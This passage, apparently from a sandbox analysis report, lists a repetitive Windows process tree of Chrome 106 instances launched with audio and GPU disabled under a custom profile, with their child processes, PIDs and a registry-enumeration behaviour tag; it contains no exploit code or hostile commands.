      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1104 --field-trial-handle=1308,i,17794871199243831904,3129422932970478797,131072 /prefetch:2
      4⤵
      PID:6352
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1452 --field-trial-handle=1308,i,17794871199243831904,3129422932970478797,131072 /prefetch:8
      4⤵
      PID:4384
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:5104
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:4416
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1128 --field-trial-handle=1280,i,18267637203552111474,1214879020492992442,131072 /prefetch:2
      4⤵
      PID:3884
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1432 --field-trial-handle=1280,i,18267637203552111474,1214879020492992442,131072 /prefetch:8
      4⤵
      PID:3876
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:5012
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:4860
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1108 --field-trial-handle=1276,i,613782072542438296,18239806311493444433,131072 /prefetch:2
      4⤵
      PID:6520
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1424 --field-trial-handle=1276,i,613782072542438296,18239806311493444433,131072 /prefetch:8
      4⤵
      PID:3440
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:2504
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:4720
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1136 --field-trial-handle=1252,i,9707799784850604383,1034746675188991788,131072 /prefetch:2
      4⤵
      PID:3248
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1452 --field-trial-handle=1252,i,9707799784850604383,1034746675188991788,131072 /prefetch:8
      4⤵
      PID:4664
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:4716
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:1100
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1216 --field-trial-handle=1280,i,13885642990566688955,2775695584303658992,131072 /prefetch:2
      4⤵
      PID:1812
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1412 --field-trial-handle=1280,i,13885642990566688955,2775695584303658992,131072 /prefetch:8
      4⤵
      PID:3988
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:4656
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:4212
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1084 --field-trial-handle=1312,i,3799362530549225707,16303919223157019412,131072 /prefetch:2
      4⤵
      PID:3852
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1444 --field-trial-handle=1312,i,3799362530549225707,16303919223157019412,131072 /prefetch:8
      4⤵
      PID:4464
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:4692
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:5092
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1156 --field-trial-handle=1288,i,15774812882947335212,4407333267847959200,131072 /prefetch:2
      4⤵
      PID:1512
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1348 --field-trial-handle=1288,i,15774812882947335212,4407333267847959200,131072 /prefetch:8
      4⤵
      PID:3768
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:5432
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:5556
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1192 --field-trial-handle=1292,i,10721623861464357340,18391981774838957972,131072 /prefetch:2
      4⤵
      PID:5580
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1332 --field-trial-handle=1292,i,10721623861464357340,18391981774838957972,131072 /prefetch:8
      4⤵
      PID:4396
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:5544
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:5600
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1140 --field-trial-handle=1272,i,11331093000911044292,5051986698101149756,131072 /prefetch:2
      4⤵
      PID:6956
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1432 --field-trial-handle=1272,i,11331093000911044292,5051986698101149756,131072 /prefetch:8
      4⤵
      PID:4180
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:5668
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:5756
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1176 --field-trial-handle=1284,i,5375623907256772639,6276610226077659557,131072 /prefetch:2
      4⤵
      PID:6508
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1428 --field-trial-handle=1284,i,5375623907256772639,6276610226077659557,131072 /prefetch:8
      4⤵
      PID:916
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:5868
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:5972
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1132 --field-trial-handle=1248,i,6863589237299361168,447594604819465257,131072 /prefetch:2
      4⤵
      PID:4612
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1412 --field-trial-handle=1248,i,6863589237299361168,447594604819465257,131072 /prefetch:8
      4⤵
      PID:4476
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    PID:5452
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:5748
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1148 --field-trial-handle=1248,i,12922001429366691984,6753004949890191931,131072 /prefetch:2
      4⤵
      PID:6548
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1432 --field-trial-handle=1248,i,12922001429366691984,6753004949890191931,131072 /prefetch:8
      4⤵
      PID:5504
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:5516
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:3640
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1232 --field-trial-handle=1252,i,8273579582482666911,18289579235635664718,131072 /prefetch:2
      4⤵
      PID:5244
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1432 --field-trial-handle=1252,i,8273579582482666911,18289579235635664718,131072 /prefetch:8
      4⤵
      PID:6504
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    PID:4064
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:5312
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
